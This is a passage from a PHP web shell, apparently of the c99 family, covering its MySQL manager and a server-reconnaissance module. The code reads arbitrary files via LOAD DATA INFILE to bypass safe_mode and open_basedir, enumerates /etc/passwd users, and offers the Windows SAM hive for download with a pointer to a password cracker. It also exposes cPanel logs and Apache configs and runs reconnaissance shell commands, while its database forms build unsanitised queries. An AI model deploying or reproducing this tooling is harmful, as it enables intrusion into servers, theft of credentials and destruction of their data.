  2439.      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  2440.  
  2441.      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  2442.  
  2443.      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  2444.  
  2445.      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  2446.  
  2447.      if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
  2448.  
  2449.      if ($sql_tbl_act == "insert")
  2450.  
  2451.      {
  2452.  
  2453.       if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
  2454.  
  2455.       if (!empty($sql_tbl_insert_radio))
  2456.  
  2457.       {
  2458.  
  2459.  
  2460.  
  2461.       }
  2462.  
  2463.       else
  2464.  
  2465.       {
  2466.  
  2467.        echo "<br><br><b>Inserting row into table:</b><br>";
  2468.  
  2469.        if (!empty($sql_tbl_insert_q))
  2470.  
  2471.        {
  2472.  
  2473.         $sql_query = "SELECT * FROM `".$sql_tbl."`";
  2474.  
  2475.         $sql_query .= " WHERE".$sql_tbl_insert_q;
  2476.  
  2477.         $sql_query .= " LIMIT 1;";
  2478.  
  2479.         $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
  2480.  
  2481.         $values = mysql_fetch_assoc($result);
  2482.  
  2483.         mysql_free_result($result);
  2484.  
  2485.        }
  2486.  
  2487.        else {$values = array();}
  2488.  
  2489.        echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
  2490.  
  2491.        foreach ($tbl_struct_fields as $field)
  2492.  
  2493.        {
  2494.  
  2495.         $name = $field["Field"];
  2496.  
  2497.         if (empty($sql_tbl_insert_q)) {$v = "";}
  2498.  
  2499.         echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
  2500.  
  2501.         $i++;
  2502.  
  2503.        }
  2504.  
  2505.        echo "</table><br>";
  2506.  
  2507.        echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
  2508.  
  2509.        if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
  2510.  
  2511.        echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
  2512.  
  2513.       }
  2514.  
  2515.      }
  2516.  
  2517.      if ($sql_tbl_act == "browse")
  2518.  
  2519.      {
  2520.  
  2521.       $sql_tbl_ls = abs($sql_tbl_ls);
  2522.  
  2523.       $sql_tbl_le = abs($sql_tbl_le);
  2524.  
  2525.       echo "<hr size=\"1\" noshade>";
  2526.  
  2527.       echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
  2528.  
  2529.       $b = 0;
  2530.  
  2531.       for($i=0;$i<$numpages;$i++)
  2532.  
  2533.       {
  2534.  
  2535.        if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
  2536.  
  2537.        echo $i;
  2538.  
  2539.        if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
  2540.  
  2541.        if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
  2542.  
  2543.        else {echo "&nbsp;";}
  2544.  
  2545.       }
  2546.  
  2547.       if ($i == 0) {echo "empty";}
  2548.  
  2549.       echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
  2550.  
  2551.       echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1>";
  2552.  
  2553.       echo "<tr>";
  2554.  
  2555.       echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
  2556.  
  2557.       for ($i=0;$i<mysql_num_fields($result);$i++)
  2558.  
  2559.       {
  2560.  
  2561.        $v = mysql_field_name($result,$i);
  2562.  
  2563.        if ($e[0] == "a") {$s = "d"; $m = "asc";}
  2564.  
  2565.        else {$s = "a"; $m = "desc";}
  2566.  
  2567.        echo "<td>";
  2568.  
  2569.        if (empty($e[0])) {$e[0] = "a";}
  2570.  
  2571.        if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
  2572.  
  2573.        else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
  2574.  
  2575.        echo "</td>";
  2576.  
  2577.       }
  2578.  
  2579.       echo "<td><font color=\"green\"><b>Action</b></font></td>";
  2580.  
  2581.       echo "</tr>";
  2582.  
  2583.       while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
  2584.  
  2585.       {
  2586.  
  2587.        echo "<tr>";
  2588.  
  2589.        $w = "";
  2590.  
  2591.        $i = 0;
  2592.  
  2593.        foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
  2594.  
  2595.        if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
  2596.  
  2597.        echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
  2598.  
  2599.        $i = 0;
  2600.  
  2601.        foreach ($row as $k=>$v)
  2602.  
  2603.        {
  2604.  
  2605.         $v = htmlspecialchars($v);
  2606.  
  2607.         if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
  2608.  
  2609.         echo "<td>".$v."</td>";
  2610.  
  2611.         $i++;
  2612.  
  2613.        }
  2614.  
  2615.        echo "<td>";
  2616.  
  2617.        echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
  2618.  
  2619.        echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
  2620.  
  2621.        echo "</td>";
  2622.  
  2623.        echo "</tr>";
  2624.  
  2625.       }
  2626.  
  2627.       mysql_free_result($result);
  2628.  
  2629.       echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
  2630.  
  2631.       echo "<option value=\"\">With selected:</option>";
  2632.  
  2633.       echo "<option value=\"deleterow\">Delete</option>";
  2634.  
  2635.       echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
  2636.  
  2637.      }
  2638.  
  2639.     }
  2640.  
  2641.     else
  2642.  
  2643.     {
  2644.  
  2645.      $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
  2646.  
  2647.      if (!$result) {echo mysql_smarterror();}
  2648.  
  2649.      else
  2650.  
  2651.      {
  2652.  
  2653.       echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
  2654.  
  2655.      
  2656.  
  2657.       $i = 0;
  2658.  
  2659.       $tsize = $trows = 0;
  2660.  
  2661.       while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
  2662.  
  2663.       {
  2664.  
  2665.        $tsize += $row["Data_length"];
  2666.  
  2667.        $trows += $row["Rows"];
  2668.  
  2669.        $size = view_size($row["Data_length"]);
  2670.  
  2671.        echo "<tr>";
  2672.  
  2673.        echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
  2674.  
  2675.        echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
  2676.  
  2677.        echo "<td>".$row["Rows"]."</td>";
  2678.  
  2679.        echo "<td>".$row["Type"]."</td>";
  2680.  
  2681.        echo "<td>".$row["Create_time"]."</td>";
  2682.  
  2683.        echo "<td>".$row["Update_time"]."</td>";
  2684.  
  2685.        echo "<td>".$size."</td>";
  2686.  
  2687.        echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
  2688.  
  2689.        echo "</tr>";
  2690.  
  2691.        $i++;
  2692.  
  2693.       }
  2694.  
  2695.       echo "<tr bgcolor=\"000000\">";
  2696.  
  2697.       echo "<td><center><b>»</b></center></td>";
  2698.  
  2699.       echo "<td><center><b>".$i." table(s)</b></center></td>";
  2700.  
  2701.       echo "<td><b>".$trows."</b></td>";
  2702.  
  2703.       echo "<td>".$row[1]."</td>";
  2704.  
  2705.       echo "<td>".$row[10]."</td>";
  2706.  
  2707.       echo "<td>".$row[11]."</td>";
  2708.  
  2709.       echo "<td><b>".view_size($tsize)."</b></td>";
  2710.  
  2711.       echo "<td></td>";
  2712.  
  2713.       echo "</tr>";
  2714.  
  2715.       echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
  2716.  
  2717.       echo "<option value=\"\">With selected:</option>";
  2718.  
  2719.       echo "<option value=\"tbldrop\">Drop</option>";
  2720.  
  2721.       echo "<option value=\"tblempty\">Empty</option>";
  2722.  
  2723.       echo "<option value=\"tbldump\">Dump</option>";
  2724.  
  2725.       echo "<option value=\"tblcheck\">Check table</option>";
  2726.  
  2727.       echo "<option value=\"tbloptimize\">Optimize table</option>";
  2728.  
  2729.       echo "<option value=\"tblrepair\">Repair table</option>";
  2730.  
  2731.       echo "<option value=\"tblanalyze\">Analyze table</option>";
  2732.  
  2733.       echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
  2734.  
  2735.       mysql_free_result($result);
  2736.  
  2737.      }
  2738.  
  2739.     }
  2740.  
  2741.    }
  2742.  
  2743.    }
  2744.  
  2745.   }
  2746.  
  2747.   else
  2748.  
  2749.   {
  2750.  
  2751.    $acts = array("","newdb","serverstatus","servervars","processes","getfile");
  2752.  
  2753.    if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
  2754.  
  2755.    if (!empty($sql_act))
  2756.  
  2757.    {
  2758.  
  2759.     echo "<hr size=\"1\" noshade>";
  2760.  
  2761.     if ($sql_act == "newdb")
  2762.  
  2763.     {
  2764.  
  2765.      echo "<b>";
  2766.  
  2767.      if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
  2768.  
  2769.      else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
  2770.  
  2771.     }
  2772.  
  2773.     if ($sql_act == "serverstatus")
  2774.  
  2775.     {
  2776.  
  2777.      $result = mysql_query("SHOW STATUS", $sql_sock);
  2778.  
  2779.      echo "<center><b>Server-status variables:</b><br><br>";
  2780.  
  2781.      echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#15354c borderColorLight=#15354c border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
  2782.  
  2783.      while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  2784.  
  2785.      echo "</table></center>";
  2786.  
  2787.      mysql_free_result($result);
  2788.  
  2789.     }
  2790.  
  2791.     if ($sql_act == "servervars")
  2792.  
  2793.     {
  2794.  
  2795.      $result = mysql_query("SHOW VARIABLES", $sql_sock);
  2796.  
  2797.      echo "<center><b>Server variables:</b><br><br>";
  2798.  
  2799.      echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#15354c borderColorLight=#15354c border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
  2800.  
  2801.      while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  2802.  
  2803.      echo "</table>";
  2804.  
  2805.      mysql_free_result($result);
  2806.  
  2807.     }
  2808.  
  2809.     if ($sql_act == "processes")
  2810.  
  2811.     {
  2812.  
  2813.      if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
  2814.  
  2815.      $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
  2816.  
  2817.      echo "<center><b>Processes:</b><br><br>";
  2818.  
  2819.      echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#15354c borderColorLight=#15354c border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
  2820.  
  2821.      while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
  2822.  
  2823.      echo "</table>";
  2824.  
  2825.      mysql_free_result($result);
  2826.  
  2827.     }
  2828.  
  2829.     if ($sql_act == "getfile")
  2830.  
  2831.     {
  2832.  
  2833.      $tmpdb = $sql_login."_tmpdb";
  2834.  
  2835.      $select = mysql_select_db($tmpdb);
  2836.  
  2837.      if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
  2838.  
  2839.      if ($select)
  2840.  
  2841.      {
  2842.  
  2843.       $created = FALSE;
  2844.  
  2845.       mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
  2846.  
  2847.       mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
  2848.  
  2849.       $result = mysql_query("SELECT * FROM tmp_file;");
  2850.  
  2851.       if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
  2852.  
  2853.       else
  2854.  
  2855.       {
  2856.  
  2857.        for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
  2858.  
  2859.        $f = "";
  2860.  
  2861.        while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
  2862.  
  2863.        if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
  2864.  
  2865.        else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
  2866.  
  2867.        mysql_free_result($result);
  2868.  
  2869.        mysql_query("DROP TABLE tmp_file;");
  2870.  
  2871.       }
  2872.  
  2873.      }
  2874.  
  2875.      mysql_drop_db($tmpdb); //comment it if you want to leave database
  2876.  
  2877.     }
  2878.  
  2879.    }
  2880.  
  2881.   }
  2882.  
  2883.  }
  2884.  
  2885.  echo "</td></tr></table>";
  2886.  
  2887.  if ($sql_sock)
  2888.  
  2889.  {
  2890.  
  2891.   $affected = @mysql_affected_rows($sql_sock);
  2892.  
  2893.   if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
  2894.  
  2895.   echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
  2896.  
  2897.  }
  2898.  
  2899.  echo "</table>";
  2900.  
  2901. }
  2902.  
  2903. if ($act == "mkdir")
  2904. {
  2905.  
  2906.  if ($mkdir != $d)
  2907.  {
  2908.  
  2909.   if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
  2910.  
  2911.   elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
  2912.  
  2913.   echo "<br><br>";
  2914.  
  2915.  }
  2916.  
  2917.  $act = $dspact = "ls";
  2918.  
  2919. }
  2920.  
  2921. if ($act == "d")
  2922.  
  2923. {
  2924.  
  2925.  if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
  2926.  
  2927.  else
  2928.  
  2929.  {
  2930.  
  2931.   echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
  2932.  
  2933.   if (!$win)
  2934.  
  2935.   {
  2936.  
  2937.    echo "<tr><td><b>Owner/Group</b></td><td> ";
  2938.  
  2939.    $ow = posix_getpwuid(fileowner($d));
  2940.  
  2941.    $gr = posix_getgrgid(filegroup($d));
  2942.  
  2943.    $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
  2944.  
  2945.   }
  2946.  
  2947.   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
  2948.  
  2949.  }
  2950.  
  2951. }
  2952.  
  2953.  
  2954. if ($act == "security")
  2955. {
  2956.  
  2957.  echo "<center><b>Server information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
  2958.  
  2959.  if (!$win)
  2960.  
  2961.  {
  2962.  
  2963.   if ($nixpasswd)
  2964.  
  2965.   {
  2966.  
  2967.    if ($nixpasswd == 1) {$nixpasswd = 0;}
  2968.  
  2969.    echo "<b>*nix /etc/passwd:</b><br>";
  2970.  
  2971.    if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
  2972.  
  2973.    if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
  2974.  
  2975.    echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
  2976.  
  2977.    $i = $nixpwd_s;
  2978.  
  2979.    while ($i < $nixpwd_e)
  2980.  
  2981.    {
  2982.  
  2983.     $uid = posix_getpwuid($i);
  2984.  
  2985.     if ($uid)
  2986.  
  2987.     {
  2988.  
  2989.      $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
  2990.  
  2991.      echo join(":",$uid)."<br>";
  2992.  
  2993.     }
  2994.  
  2995.     $i++;
  2996.  
  2997.    }
  2998.  
  2999.   }
  3000.  
  3001.   else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
  3002.  
  3003.  }
  3004.  
  3005.  else
  3006.  {
  3007.   $v = $_SERVER["WINDIR"]."\repair\sam";
  3008.  
  3009.   if (file_get_contents($v)) {echo "<b><font color=red>You can't crack WIN NT passwords(".$v.") </font></b><br>";}
  3010.  
  3011.   else {echo "<b><font color=green>You can crack WIN NT passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
  3012.  }
  3013.  
  3014.  if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
  3015.  
  3016.  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
  3017.  
  3018.  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
  3019.  
  3020.  if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
  3021.  
  3022.  if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
  3023.  
  3024.  if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
  3025.  
  3026.  if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
  3027.  
  3028.  function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
  3029.  
  3030.  displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
  3031.  
  3032.  displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
  3033.  
  3034.  displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
  3035.  
  3036.  displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
  3037.  
  3038.  displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
  3039.  
  3040.  displaysecinfo("RAM",myshellexec("free -m"));
  3041.  
  3042.  displaysecinfo("HDD space",myshellexec("df -h"));
  3043.  
  3044.  displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
  3045.  
  3046.  displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
  3047.  
  3048.  displaysecinfo("Is cURL installed?",myshellexec("which curl"));
  3049.  
  3050.  displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
  3051.  
  3052.  displaysecinfo("Is links installed?",myshellexec("which links"));
  3053.  
  3054.  displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
  3055.  
  3056.  displaysecinfo("Is GET installed?",myshellexec("which GET"));
  3057.  
  3058.  displaysecinfo("Is perl installed?",myshellexec("which perl"));
  3059.  
  3060.  displaysecinfo("Where is apache",myshellexec("whereis apache"));
  3061.  
  3062.  displaysecinfo("Where is perl?",myshellexec("whereis perl"));
  3063.  
  3064.  displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
  3065.  
  3066.  displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
  3067.  
  3068.  displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
  3069.  
  3070.  displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
  3071.  
  3072. }
  3073.  
  3074. if ($act == "mkfile")
  3075.  
  3076. {
  3077.  if ($mkfile != $d)
  3078.  
  3079.  {
  3080.   if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
  3081.  
  3082.   elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
  3083.  
  3084.   else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
  3085.  
  3086.  }
  3087.  else {$act = $dspact = "ls";}
  3088.  
  3089. }
  3090.  
  3091. if ($act == "encoder")
  3092.  
  3093. {
